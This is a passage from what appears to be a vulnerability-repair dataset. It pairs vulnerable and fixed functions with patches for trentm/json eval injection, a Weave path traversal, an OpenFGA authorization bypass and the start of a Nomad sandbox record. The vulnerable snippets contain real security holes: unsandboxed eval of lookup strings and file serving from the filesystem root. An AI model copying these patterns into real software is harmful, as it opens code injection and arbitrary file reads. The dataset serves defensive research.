downstream component."}}, "repo": "https://github.com/trentm/json", "patch_url": ["https://github.com/trentm/json/commit/cc4798169f9e0f181f8aa61905b88479badcd483"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_189_1", "commit": "8d3cf25", "file_path": "lib/json.js", "start_line": 764, "end_line": 883, "snippet": "function parseLookup(lookup, lookupDelim) {\n var debug = function () {};\n //var debug = console.warn;\n\n var bits = [];\n debug('\\n*** ' + lookup + ' ***');\n\n bits = [];\n lookupDelim = lookupDelim || '.';\n var bit = '';\n var states = [null];\n var escaped = false;\n var ch = null;\n for (var i = 0; i < lookup.length; ++i) {\n var escaped = (!escaped && ch === '\\\\');\n var ch = lookup[i];\n debug('-- i=' + i + ', ch=' + JSON.stringify(ch) + ' escaped=' +\n JSON.stringify(escaped));\n debug('states: ' + JSON.stringify(states));\n\n if (escaped) {\n bit += ch;\n continue;\n }\n\n switch (states[states.length - 1]) {\n case null:\n switch (ch) {\n case '\"':\n case '\\'':\n states.push(ch);\n bit += ch;\n break;\n case '[':\n states.push(ch);\n if (bit !== '') {\n bits.push(bit);\n bit = ''\n }\n bit += ch;\n break;\n case lookupDelim:\n if (bit !== '') {\n bits.push(bit);\n bit = ''\n }\n break;\n default:\n bit += ch;\n break;\n }\n break;\n\n case '[':\n bit += ch;\n switch (ch) {\n case '\"':\n case '\\'':\n case '[':\n states.push(ch);\n break;\n case ']':\n states.pop();\n if (states[states.length - 1] === null) {\n var evaled = vm.runInNewContext(\n '(' + bit.slice(1, -1) + ')', {}, '');\n bits.push(evaled);\n bit = ''\n }\n break;\n }\n break;\n\n case '\"':\n bit += ch;\n switch (ch) {\n case '\"':\n states.pop();\n if (states[states.length - 1] === null) {\n bits.push(bit);\n bit = ''\n }\n break;\n }\n break;\n\n case '\\'':\n bit += ch;\n switch (ch) {\n case '\\'':\n states.pop();\n if (states[states.length - 1] === null) {\n bits.push(bit);\n bit = ''\n }\n break;\n }\n break;\n }\n debug('bit: ' + JSON.stringify(bit));\n debug('bits: ' + JSON.stringify(bits));\n }\n\n if (bit !== '') {\n bits.push(bit);\n bit = ''\n }\n\n // Negative-intify: strings that are negative ints we change to a Number for\n // special handling in `lookupDatum`: Python-style negative array indexing.\n var negIntPat = /^-\\d+$/;\n for (var i = 0; i < bits.length; i++) {\n if (negIntPat.test(bits[i])) {\n bits[i] = Number(bits[i]);\n }\n }\n\n debug(JSON.stringify(lookup) + ' -> ' + JSON.stringify(bits));\n return bits\n}"}, {"id": "vul_js_189_2", "commit": "8d3cf25", "file_path": "lib/json.js", "start_line": 1239, "end_line": 1379, "snippet": "function main(argv) {\n var opts;\n try {\n opts = parseArgv(argv);\n } catch (e) {\n warn('json: error: %s', e.message)\n return drainStdoutAndExit(1);\n }\n //warn(opts);\n if (opts.help) {\n printHelp();\n return;\n }\n if (opts.version) {\n if (opts.outputMode === OM_JSON) {\n var v = {\n version: getVersion(),\n author: 'Trent Mick',\n project: 'https://github.com/trentm/json'\n };\n console.log(JSON.stringify(v, null, opts.jsonIndent));\n } else {\n console.log('json ' + getVersion());\n console.log('written by Trent Mick');\n console.log('https://github.com/trentm/json');\n }\n return;\n }\n var lookupStrs = opts.args;\n\n // Prepare condition and execution funcs (and vm scripts) for -c/-e.\n var execVm = Boolean(process.env.JSON_EXEC &&\n process.env.JSON_EXEC === 'vm');\n var i;\n var condFuncs = [];\n if (!execVm) {\n for (i = 0; i < opts.condSnippets.length; i++) {\n condFuncs[i] = funcWithReturnFromSnippet(opts.condSnippets[i]);\n }\n }\n var condScripts = [];\n if (execVm) {\n for (i = 0; i < opts.condSnippets.length; i++) {\n condScripts[i] = vm.createScript(opts.condSnippets[i]);\n }\n }\n var cond = Boolean(condFuncs.length + condScripts.length);\n var exeFuncs = [];\n if (!execVm) {\n for (i = 0; i < opts.exeSnippets.length; i++) {\n exeFuncs[i] = new Function(opts.exeSnippets[i]);\n }\n }\n var exeScripts = [];\n if (execVm) {\n for (i = 0; i < opts.exeSnippets.length; i++) {\n exeScripts[i] = vm.createScript(opts.exeSnippets[i]);\n }\n }\n var exe = Boolean(exeFuncs.length + exeScripts.length);\n\n var lookups = lookupStrs.map(function (lookup) {\n return parseLookup(lookup, opts.lookupDelim);\n });\n\n if (opts.group && opts.array && opts.outputMode !== OM_JSON) {\n // streaming\n var chunker = chunkEmitter(opts);\n chunker.on('error', function (error) {\n warn('json: error: %s', err.message);\n return drainStdoutAndExit(1);\n });\n chunker.on('chunk', parseChunk);\n } else if (opts.inPlace) {\n assert.equal(opts.inputFiles.length, 1,\n 'cannot handle more than one file with -I');\n getInput(opts, function (err, content, filename) {\n if (err) {\n warn('json: error: %s', err.message)\n return drainStdoutAndExit(1);\n }\n\n // Take off a leading HTTP header if any and pass it through.\n var headers = [];\n while (true) {\n if (content.slice(0, 5) === 'HTTP/') {\n var index = content.indexOf('\\r\\n\\r\\n');\n var sepLen = 4;\n if (index == -1) {\n index = content.indexOf('\\n\\n');\n sepLen = 2;\n }\n if (index != -1) {\n if (!opts.dropHeaders) {\n headers.push(content.slice(0, index + sepLen));\n }\n var is100Continue = (\n content.slice(0, 21) === 'HTTP/1.1 100 Continue');\n content = content.slice(index + sepLen);\n if (is100Continue) {\n continue;\n }\n }\n }\n break;\n }\n parseChunk(content, undefined, filename, true, headers.join(''));\n });\n } else {\n // not streaming\n getInput(opts, function (err, buffer, filename) {\n if (err) {\n warn('json: error: %s', err.message)\n return drainStdoutAndExit(1);\n }\n // Take off a leading HTTP header if any and pass it through.\n while (true) {\n if (buffer.slice(0, 5) === 'HTTP/') {\n var index = buffer.indexOf('\\r\\n\\r\\n');\n var sepLen = 4;\n if (index == -1) {\n index = buffer.indexOf('\\n\\n');\n sepLen = 2;\n }\n if (index != -1) {\n if (!opts.dropHeaders) {\n emit(buffer.slice(0, index + sepLen));\n }\n var is100Continue = (\n buffer.slice(0, 21) === 'HTTP/1.1 100 Continue');\n buffer = buffer.slice(index + sepLen);\n if (is100Continue) {\n continue;\n }\n }\n }\n break;\n }\n parseChunk(buffer, null, filename, false);\n });\n }"}], "fix_func": [{"id": "fix_js_189_1", "commit": "cc47981", "file_path": "lib/json.js", "start_line": 773, "end_line": 950, "snippet": "function parseLookup(lookup, lookupDelim) {\n var debug = function () {};\n // var debug = console.warn;\n\n var bits = [];\n debug('\\n*** ' + lookup + ' ***');\n\n bits = [];\n lookupDelim = lookupDelim || '.';\n var bit = '';\n var states = [null];\n var escaped = false;\n var ch = null;\n for (var i = 0; i < lookup.length; ++i) {\n var ch = lookup[i];\n debug('-- i=' + i + ', ch=' + JSON.stringify(ch) + ' escaped=' +\n JSON.stringify(escaped));\n debug('states: ' + JSON.stringify(states));\n\n // Handle a *limited subset* of JS string escapes.\n // JSSTYLED\n // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation\n var SUPPORTED_ESCAPES = {\n '\\'': '\\'',\n '\\\"': '\\\"',\n '\\`': '\\`',\n '\\\\': '\\\\',\n 'n': '\\n',\n 'r': '\\r',\n 't': '\\t',\n 'v': '\\v',\n 'b': '\\b',\n 'f': '\\f'\n };\n if (ch === '\\\\' && i+1 < lookup.length) {\n var nextCh = lookup[i+1];\n var escapedCh = SUPPORTED_ESCAPES[nextCh];\n if (escapedCh !== undefined) {\n debug('escaped: %j -> %j', ch+nextCh, escapedCh);\n bit += escapedCh;\n i++;\n continue;\n }\n }\n\n switch (states[states.length - 1]) {\n case null:\n switch (ch) {\n case '\"':\n case '\\'':\n states.push(ch);\n bit += ch;\n break;\n case '[':\n states.push(ch);\n if (bit !== '') {\n bits.push(bit);\n bit = ''\n }\n bit += ch;\n break;\n case lookupDelim:\n if (bit !== '') {\n bits.push(bit);\n bit = ''\n }\n break;\n default:\n bit += ch;\n break;\n }\n break;\n\n case '[':\n bit += ch;\n switch (ch) {\n case '\"':\n case '\\'':\n case '[':\n states.push(ch);\n break;\n case ']':\n states.pop();\n if (states[states.length - 1] === null) {\n // `bit` is a bracketed string, `[...]`.\n //\n // The *intent* is to allow specifying an object key\n // that would otherwise get interpreted by `json`s\n // LOOKUP parsing -- typically if the key has a `.` in it.\n //\n // Up to and including json v9, this was handled by eval'ing\n // the given string inside the brackets (via\n // `vm.runInNewContext`). However, trentm/json#144 shows\n // that this is an avenue for command injection. It was\n // never made clear in `json` documentation that one\n // should never use user-provided strings for LOOKUPs, so\n // we should close this vulnerability.\n //\n // Expected usage and documented examples are like this:\n // [\"foo.bar\"]\n // ['foo.bar']\n // However, older implementation of eval'ing meant that\n // things like the following worked:\n // [42]\n // [\"my\" + \"key\"]\n // [(function () { return \"mykey\" })()]\n //\n // The documentation was never explicit about denying\n // expressions would work. v10 **breaks compatibility**\n // to only support a bracketed string:\n // [\"...\"]\n // ['...']\n // [`...`] # note: no var interpolation is done\n // and error otherwise.\n var VALID_QUOTES = '\"\\'`';\n var sQuote = bit[1];\n var eQuote = bit.slice(-2, -1);\n if (VALID_QUOTES.indexOf(sQuote) === -1 ||\n sQuote !== eQuote)\n {\n throw new Error(format('invalid bracketed lookup ' +\n 'string: %j (must be of the form [\\'...\\'], ' +\n '[\"...\"], or [`...`])', bit));\n }\n bits.push(bit.slice(2, -2));\n bit = ''\n }\n break;\n }\n break;\n\n case '\"':\n bit += ch;\n switch (ch) {\n case '\"':\n states.pop();\n if (states[states.length - 1] === null) {\n bits.push(bit);\n bit = ''\n }\n break;\n }\n break;\n\n case '\\'':\n bit += ch;\n switch (ch) {\n case '\\'':\n states.pop();\n if (states[states.length - 1] === null) {\n bits.push(bit);\n bit = ''\n }\n break;\n }\n break;\n }\n debug('bit: ' + JSON.stringify(bit));\n debug('bits: ' + JSON.stringify(bits));\n }\n\n if (bit !== '') {\n bits.push(bit);\n bit = ''\n }\n\n // Negative-intify: strings that are negative ints we change to a Number for\n // special handling in `lookupDatum`: Python-style negative array indexing.\n var negIntPat = /^-\\d+$/;\n for (var i = 0; i < bits.length; i++) {\n if (negIntPat.test(bits[i])) {\n bits[i] = Number(bits[i]);\n }\n }\n\n debug(JSON.stringify(lookup) + ' -> ' + JSON.stringify(bits));\n return bits\n}"}, {"id": "fix_js_189_2", "commit": "cc47981", "file_path": "lib/json.js", "start_line": 1306, "end_line": 1451, "snippet": "function main(argv) {\n var opts;\n try {\n opts = parseArgv(argv);\n } catch (e) {\n warn('json: error: %s', e.message)\n return drainStdoutAndExit(1);\n }\n //warn(opts);\n if (opts.help) {\n printHelp();\n return;\n }\n if (opts.version) {\n if (opts.outputMode === OM_JSON) {\n var v = {\n version: getVersion(),\n author: 'Trent Mick',\n project: 'https://github.com/trentm/json'\n };\n console.log(JSON.stringify(v, null, opts.jsonIndent));\n } else {\n console.log('json ' + getVersion());\n console.log('written by Trent Mick');\n console.log('https://github.com/trentm/json');\n }\n return;\n }\n var lookupStrs = opts.args;\n\n // Prepare condition and execution funcs (and vm scripts) for -c/-e.\n var execVm = Boolean(process.env.JSON_EXEC &&\n process.env.JSON_EXEC === 'vm');\n var i;\n var condFuncs = [];\n if (!execVm) {\n for (i = 0; i < opts.condSnippets.length; i++) {\n condFuncs[i] = funcWithReturnFromSnippet(opts.condSnippets[i]);\n }\n }\n var condScripts = [];\n if (execVm) {\n for (i = 0; i < opts.condSnippets.length; i++) {\n condScripts[i] = vm.createScript(opts.condSnippets[i]);\n }\n }\n var cond = Boolean(condFuncs.length + condScripts.length);\n var exeFuncs = [];\n if (!execVm) {\n for (i = 0; i < opts.exeSnippets.length; i++) {\n exeFuncs[i] = new Function(opts.exeSnippets[i]);\n }\n }\n var exeScripts = [];\n if (execVm) {\n for (i = 0; i < opts.exeSnippets.length; i++) {\n exeScripts[i] = vm.createScript(opts.exeSnippets[i]);\n }\n }\n var exe = Boolean(exeFuncs.length + exeScripts.length);\n\n try {\n var lookups = lookupStrs.map(function (lookup) {\n return parseLookup(lookup, opts.lookupDelim);\n });\n } catch (e) {\n warn('json: error: %s', e.message)\n return drainStdoutAndExit(1);\n }\n\n if (opts.group && opts.array && opts.outputMode !== OM_JSON) {\n // streaming\n var chunker = chunkEmitter(opts);\n chunker.on('error', function (error) {\n warn('json: error: %s', err.message);\n return drainStdoutAndExit(1);\n });\n chunker.on('chunk', parseChunk);\n } else if (opts.inPlace) {\n assert.equal(opts.inputFiles.length, 1,\n 'cannot handle more than one file with -I');\n getInput(opts, function (err, content, filename) {\n if (err) {\n warn('json: error: %s', err.message)\n return drainStdoutAndExit(1);\n }\n\n // Take off a leading HTTP header if any and pass it through.\n var headers = [];\n while (true) {\n if (content.slice(0, 5) === 'HTTP/') {\n var index = content.indexOf('\\r\\n\\r\\n');\n var sepLen = 4;\n if (index == -1) {\n index = content.indexOf('\\n\\n');\n sepLen = 2;\n }\n if (index != -1) {\n if (!opts.dropHeaders) {\n headers.push(content.slice(0, index + sepLen));\n }\n var is100Continue = (\n content.slice(0, 21) === 'HTTP/1.1 100 Continue');\n content = content.slice(index + sepLen);\n if (is100Continue) {\n continue;\n }\n }\n }\n break;\n }\n parseChunk(content, undefined, filename, true, headers.join(''));\n });\n } else {\n // not streaming\n getInput(opts, function (err, buffer, filename) {\n if (err) {\n warn('json: error: %s', err.message)\n return drainStdoutAndExit(1);\n }\n // Take off a leading HTTP header if any and pass it through.\n while (true) {\n if (buffer.slice(0, 5) === 'HTTP/') {\n var index = buffer.indexOf('\\r\\n\\r\\n');\n var sepLen = 4;\n if (index == -1) {\n index = buffer.indexOf('\\n\\n');\n sepLen = 2;\n }\n if (index != -1) {\n if (!opts.dropHeaders) {\n emit(buffer.slice(0, index + sepLen));\n }\n var is100Continue = (\n buffer.slice(0, 21) === 'HTTP/1.1 100 Continue');\n buffer = buffer.slice(index + sepLen);\n if (is100Continue) {\n continue;\n }\n }\n }\n break;\n }\n parseChunk(buffer, null, filename, false);\n });\n }"}], "vul_patch": "--- a/lib/json.js\n+++ b/lib/json.js\n@@ -1,6 +1,6 @@\n function parseLookup(lookup, lookupDelim) {\n var debug = function () {};\n- //var debug = console.warn;\n+ // var debug = console.warn;\n \n var bits = [];\n debug('\\n*** ' + lookup + ' ***');\n@@ -12,15 +12,35 @@\n var escaped = false;\n var ch = null;\n for (var i = 0; i < lookup.length; ++i) {\n- var escaped = (!escaped && ch === '\\\\');\n var ch = lookup[i];\n debug('-- i=' + i + ', ch=' + JSON.stringify(ch) + ' escaped=' +\n JSON.stringify(escaped));\n debug('states: ' + JSON.stringify(states));\n \n- if (escaped) {\n- bit += ch;\n- continue;\n+ // Handle a *limited subset* of JS string escapes.\n+ // JSSTYLED\n+ // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation\n+ var SUPPORTED_ESCAPES = {\n+ '\\'': '\\'',\n+ '\\\"': '\\\"',\n+ '\\`': '\\`',\n+ '\\\\': '\\\\',\n+ 'n': '\\n',\n+ 'r': '\\r',\n+ 't': '\\t',\n+ 'v': '\\v',\n+ 'b': '\\b',\n+ 'f': '\\f'\n+ };\n+ if (ch === '\\\\' && i+1 < lookup.length) {\n+ var nextCh = lookup[i+1];\n+ var escapedCh = SUPPORTED_ESCAPES[nextCh];\n+ if (escapedCh !== undefined) {\n+ debug('escaped: %j -> %j', ch+nextCh, escapedCh);\n+ bit += escapedCh;\n+ i++;\n+ continue;\n+ }\n }\n \n switch (states[states.length - 1]) {\n@@ -62,9 +82,47 @@\n case ']':\n states.pop();\n if (states[states.length - 1] === null) {\n- var evaled = vm.runInNewContext(\n- '(' + bit.slice(1, -1) + ')', {}, '');\n- bits.push(evaled);\n+ // `bit` is a bracketed string, `[...]`.\n+ //\n+ // The *intent* is to allow specifying an object key\n+ // that would otherwise get interpreted by `json`s\n+ // LOOKUP parsing -- typically if the key has a `.` in it.\n+ //\n+ // Up to and including json v9, this was handled by eval'ing\n+ // the given string inside the brackets (via\n+ // `vm.runInNewContext`). However, trentm/json#144 shows\n+ // that this is an avenue for command injection. It was\n+ // never made clear in `json` documentation that one\n+ // should never use user-provided strings for LOOKUPs, so\n+ // we should close this vulnerability.\n+ //\n+ // Expected usage and documented examples are like this:\n+ // [\"foo.bar\"]\n+ // ['foo.bar']\n+ // However, older implementation of eval'ing meant that\n+ // things like the following worked:\n+ // [42]\n+ // [\"my\" + \"key\"]\n+ // [(function () { return \"mykey\" })()]\n+ //\n+ // The documentation was never explicit about denying\n+ // expressions would work. v10 **breaks compatibility**\n+ // to only support a bracketed string:\n+ // [\"...\"]\n+ // ['...']\n+ // [`...`] # note: no var interpolation is done\n+ // and error otherwise.\n+ var VALID_QUOTES = '\"\\'`';\n+ var sQuote = bit[1];\n+ var eQuote = bit.slice(-2, -1);\n+ if (VALID_QUOTES.indexOf(sQuote) === -1 ||\n+ sQuote !== eQuote)\n+ {\n+ throw new Error(format('invalid bracketed lookup ' +\n+ 'string: %j (must be of the form [\\'...\\'], ' +\n+ '[\"...\"], or [`...`])', bit));\n+ }\n+ bits.push(bit.slice(2, -2));\n bit = ''\n }\n break;\n\n--- a/lib/json.js\n+++ b/lib/json.js\n@@ -59,9 +59,14 @@\n }\n var exe = Boolean(exeFuncs.length + exeScripts.length);\n \n- var lookups = lookupStrs.map(function (lookup) {\n- return parseLookup(lookup, opts.lookupDelim);\n- });\n+ try {\n+ var lookups = lookupStrs.map(function (lookup) {\n+ return parseLookup(lookup, opts.lookupDelim);\n+ });\n+ } catch (e) {\n+ warn('json: error: %s', e.message)\n+ return drainStdoutAndExit(1);\n+ }\n \n if (opts.group && opts.array && opts.outputMode !== OM_JSON) {\n // streaming\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-7340", "cve_description": "The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/wandb/weave", "patch_url": ["https://github.com/wandb/weave/commit/f43d5fb75e0d52933a52ecd9a0ce2f9b082e6c9f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_132_1", "commit": "c28d8d5", "file_path": "weave/weave_server.py", "start_line": 398, "end_line": 411, "snippet": "def send_local_file(path):\n # path is given relative to the FS root. check to see that path is a subdirectory of the\n # local artifacts path. if not, return 403. then if there is a cache scope function defined\n # call it to make sure we have access to the path\n abspath = (\n \"/\" / pathlib.Path(path)\n ) # add preceding slash as werkzeug strips this by default and it is reappended below in send_from_directory\n try:\n local_artifacts_path = pathlib.Path(filesystem.get_filesystem_dir()).absolute()\n except errors.WeaveAccessDeniedError:\n abort(403)\n if local_artifacts_path not in list(abspath.parents):\n abort(403)\n return send_from_directory(\"/\", path)"}], "fix_func": [{"id": "fix_py_132_1", "commit": "f43d5fb", "file_path": "weave/weave_server.py", "start_line": 398, "end_line": 417, "snippet": "def send_local_file(path):\n try:\n # Retrieve and normalize the local artifacts path\n local_artifacts_path = pathlib.Path(filesystem.get_filesystem_dir()).resolve(\n strict=True\n )\n\n # Construct the full absolute path of the requested file\n requested_path = (local_artifacts_path / path).resolve(strict=True)\n\n # Ensure the requested path is within the local artifacts directory\n if not str(requested_path).startswith(str(local_artifacts_path)):\n abort(403)\n\n # Send the file from the directory\n return send_from_directory(\n local_artifacts_path, str(requested_path.relative_to(local_artifacts_path))\n )\n except (errors.WeaveAccessDeniedError, FileNotFoundError):\n abort(403)"}], "vul_patch": "--- a/weave/weave_server.py\n+++ b/weave/weave_server.py\n@@ -1,14 +1,20 @@\n def send_local_file(path):\n- # path is given relative to the FS root. check to see that path is a subdirectory of the\n- # local artifacts path. if not, return 403. then if there is a cache scope function defined\n- # call it to make sure we have access to the path\n- abspath = (\n- \"/\" / pathlib.Path(path)\n- ) # add preceding slash as werkzeug strips this by default and it is reappended below in send_from_directory\n try:\n- local_artifacts_path = pathlib.Path(filesystem.get_filesystem_dir()).absolute()\n- except errors.WeaveAccessDeniedError:\n+ # Retrieve and normalize the local artifacts path\n+ local_artifacts_path = pathlib.Path(filesystem.get_filesystem_dir()).resolve(\n+ strict=True\n+ )\n+\n+ # Construct the full absolute path of the requested file\n+ requested_path = (local_artifacts_path / path).resolve(strict=True)\n+\n+ # Ensure the requested path is within the local artifacts directory\n+ if not str(requested_path).startswith(str(local_artifacts_path)):\n+ abort(403)\n+\n+ # Send the file from the directory\n+ return send_from_directory(\n+ local_artifacts_path, str(requested_path.relative_to(local_artifacts_path))\n+ )\n+ except (errors.WeaveAccessDeniedError, FileNotFoundError):\n abort(403)\n- if local_artifacts_path not in list(abspath.parents):\n- abort(403)\n- return send_from_directory(\"/\", path)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-46331", "cve_description": "OpenFGA is a high-performance and flexible authorization/permission engine built for developers and inspired by Google Zanzibar. OpenFGA v1.8.10 to v1.3.6 (Helm chart <= openfga-0.2.28, docker <= v.1.8.10) are vulnerable to authorization bypass when certain Check and ListObject calls are executed. This issue has been patched in version 1.8.11.", "cwe_info": {"CWE-284": {"name": "Improper Access Control", "description": "The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor."}}, "repo": "https://github.com/openfga/openfga", "patch_url": ["https://github.com/openfga/openfga/commit/244302e7a8b979d66cc1874a3899cdff7d47862f"], "programing_language": "Go", "vul_func": [{"id": "vul_go_67_1", "commit": "1486ac4", "file_path": "internal/graph/cached_resolver.go", "start_line": 145, "end_line": 194, "snippet": "func (c *CachedCheckResolver) ResolveCheck(\n\tctx context.Context,\n\treq *ResolveCheckRequest,\n) (*ResolveCheckResponse, error) {\n\tspan := trace.SpanFromContext(ctx)\n\n\tcacheKey := BuildCacheKey(*req)\n\n\ttryCache := req.Consistency != openfgav1.ConsistencyPreference_HIGHER_CONSISTENCY\n\n\tif tryCache {\n\t\tcheckCacheTotalCounter.Inc()\n\t\tif cachedResp := c.cache.Get(cacheKey); cachedResp != nil {\n\t\t\tres := cachedResp.(*CheckResponseCacheEntry)\n\t\t\tisValid := res.LastModified.After(req.LastCacheInvalidationTime)\n\t\t\tc.logger.Debug(\"CachedCheckResolver found cache key\",\n\t\t\t\tzap.String(\"store_id\", req.GetStoreID()),\n\t\t\t\tzap.String(\"authorization_model_id\", req.GetAuthorizationModelID()),\n\t\t\t\tzap.String(\"tuple_key\", req.GetTupleKey().String()),\n\t\t\t\tzap.Bool(\"isValid\", isValid))\n\n\t\t\tspan.SetAttributes(attribute.Bool(\"cached\", isValid))\n\t\t\tif isValid {\n\t\t\t\tcheckCacheHitCounter.Inc()\n\t\t\t\t// return a copy to avoid races across goroutines\n\t\t\t\treturn res.CheckResponse.clone(), nil\n\t\t\t}\n\n\t\t\t// we tried the cache and hit an invalid entry\n\t\t\tcheckCacheInvalidHit.Inc()\n\t\t} else {\n\t\t\tc.logger.Debug(\"CachedCheckResolver not found cache key\",\n\t\t\t\tzap.String(\"store_id\", req.GetStoreID()),\n\t\t\t\tzap.String(\"authorization_model_id\", req.GetAuthorizationModelID()),\n\t\t\t\tzap.String(\"tuple_key\", req.GetTupleKey().String()))\n\t\t}\n\t}\n\n\t// not in cache, or consistency options experimental flag is set, and consistency param set to HIGHER_CONSISTENCY\n\tresp, err := c.delegate.ResolveCheck(ctx, req)\n\tif err != nil {\n\t\ttelemetry.TraceError(span, err)\n\t\treturn nil, err\n\t}\n\n\tclonedResp := resp.clone()\n\n\tc.cache.Set(cacheKey, &CheckResponseCacheEntry{LastModified: time.Now(), CheckResponse: clonedResp}, c.cacheTTL)\n\treturn resp, nil\n}"}], "fix_func": [{"id": "fix_go_67_1", "commit": "244302e", "file_path": "internal/graph/cached_resolver.go", "start_line": 145, "end_line": 206, "snippet": "func (c *CachedCheckResolver) ResolveCheck(\n\tctx context.Context,\n\treq *ResolveCheckRequest,\n) (*ResolveCheckResponse, error) {\n\tspan := trace.SpanFromContext(ctx)\n\n\tcacheKey := BuildCacheKey(*req)\n\n\ttryCache := req.Consistency != openfgav1.ConsistencyPreference_HIGHER_CONSISTENCY\n\n\tif tryCache {\n\t\tcheckCacheTotalCounter.Inc()\n\t\tif cachedResp := c.cache.Get(cacheKey); cachedResp != nil {\n\t\t\tres := cachedResp.(*CheckResponseCacheEntry)\n\t\t\tisValid := res.LastModified.After(req.LastCacheInvalidationTime)\n\t\t\tc.logger.Debug(\"CachedCheckResolver found cache key\",\n\t\t\t\tzap.String(\"store_id\", req.GetStoreID()),\n\t\t\t\tzap.String(\"authorization_model_id\", req.GetAuthorizationModelID()),\n\t\t\t\tzap.String(\"tuple_key\", req.GetTupleKey().String()),\n\t\t\t\tzap.Bool(\"isValid\", isValid))\n\n\t\t\tspan.SetAttributes(attribute.Bool(\"cached\", isValid))\n\t\t\tif isValid {\n\t\t\t\tcheckCacheHitCounter.Inc()\n\t\t\t\t// return a copy to avoid races across goroutines\n\t\t\t\treturn res.CheckResponse.clone(), nil\n\t\t\t}\n\n\t\t\t// we tried the cache and hit an invalid entry\n\t\t\tcheckCacheInvalidHit.Inc()\n\t\t} else {\n\t\t\tc.logger.Debug(\"CachedCheckResolver not found cache key\",\n\t\t\t\tzap.String(\"store_id\", req.GetStoreID()),\n\t\t\t\tzap.String(\"authorization_model_id\", req.GetAuthorizationModelID()),\n\t\t\t\tzap.String(\"tuple_key\", req.GetTupleKey().String()))\n\t\t}\n\t}\n\n\t// not in cache, or consistency options experimental flag is set, and consistency param set to HIGHER_CONSISTENCY\n\tresp, err := c.delegate.ResolveCheck(ctx, req)\n\tif err != nil {\n\t\ttelemetry.TraceError(span, err)\n\t\treturn nil, err\n\t}\n\n\t// when the response indicates cycle detected. The result is indeterminate because the\n\t// parent of the cycle could have resolved to true. Thus, we don't save the result and let\n\t// the parent handle it.\n\tif resp.GetCycleDetected() {\n\t\tspan.SetAttributes(attribute.Bool(\"cycle_detected\", true))\n\t\tc.logger.Debug(\"CachedCheckResolver not saving to cache due to cycle\",\n\t\t\tzap.String(\"store_id\", req.GetStoreID()),\n\t\t\tzap.String(\"authorization_model_id\", req.GetAuthorizationModelID()),\n\t\t\tzap.String(\"tuple_key\", req.GetTupleKey().String()))\n\t\treturn resp, nil\n\t}\n\n\tclonedResp := resp.clone()\n\n\tc.cache.Set(cacheKey, &CheckResponseCacheEntry{LastModified: time.Now(), CheckResponse: clonedResp}, c.cacheTTL)\n\treturn resp, nil\n}"}], "vul_patch": "--- a/internal/graph/cached_resolver.go\n+++ b/internal/graph/cached_resolver.go\n@@ -43,6 +43,18 @@\n \t\treturn nil, err\n \t}\n \n+\t// when the response indicates cycle detected. The result is indeterminate because the\n+\t// parent of the cycle could have resolved to true. Thus, we don't save the result and let\n+\t// the parent handle it.\n+\tif resp.GetCycleDetected() {\n+\t\tspan.SetAttributes(attribute.Bool(\"cycle_detected\", true))\n+\t\tc.logger.Debug(\"CachedCheckResolver not saving to cache due to cycle\",\n+\t\t\tzap.String(\"store_id\", req.GetStoreID()),\n+\t\t\tzap.String(\"authorization_model_id\", req.GetAuthorizationModelID()),\n+\t\t\tzap.String(\"tuple_key\", req.GetTupleKey().String()))\n+\t\treturn resp, nil\n+\t}\n+\n \tclonedResp := resp.clone()\n \n \tc.cache.Set(cacheKey, &CheckResponseCacheEntry{LastModified: time.Now(), CheckResponse: clonedResp}, c.cacheTTL)\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-46331:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/openfga\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestCachedCheckResolver_FieldsInResponse$ github.com/openfga/openfga/internal/graph\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-46331:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/openfga\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(TestResolveCheck_ConcurrentCachedReadsAndWrites|TestResolveCheckFromCache|TestBuildCacheKey|TestResolveCheckExpired|TestResolveCheckLastChangelogRecent)$' github.com/openfga/openfga/internal/graph"} {"cve_id": "CVE-2020-28348", "cve_description": "HashiCorp Nomad and Nomad Enterprise 0.9.0 up to 0.12.7 client Docker file sandbox feature may be subverted when not explicitly disabled or when using a volume mount type. Fixed in 0.12.8, 0.11.7, and 0.10.8.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/hashicorp/nomad", "patch_url": ["https://github.com/hashicorp/nomad/commit/9c1073d9633691ff7ba8804f59c68b822af521bd", "https://github.com/hashicorp/nomad/commit/d81120b0fd97c3d2acb65983d89ff8f9241bcdf9", "https://github.com/hashicorp/nomad/commit/60871f6024469d6846a473269b9aa637b6e42d0e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_260_1", "commit": "cd01438c153b844009f501a7cc5447137f398094", "file_path": "drivers/docker/driver.go", "start_line": 675, "end_line": 1050, "snippet": "func (d *Driver) createContainerConfig(task *drivers.TaskConfig, driverConfig *TaskConfig,\n\timageID string) (docker.CreateContainerOptions, error) {\n\n\t// ensure that PortMap variables are populated early on\n\ttask.Env = taskenv.SetPortMapEnvs(task.Env, driverConfig.PortMap)\n\n\tlogger := 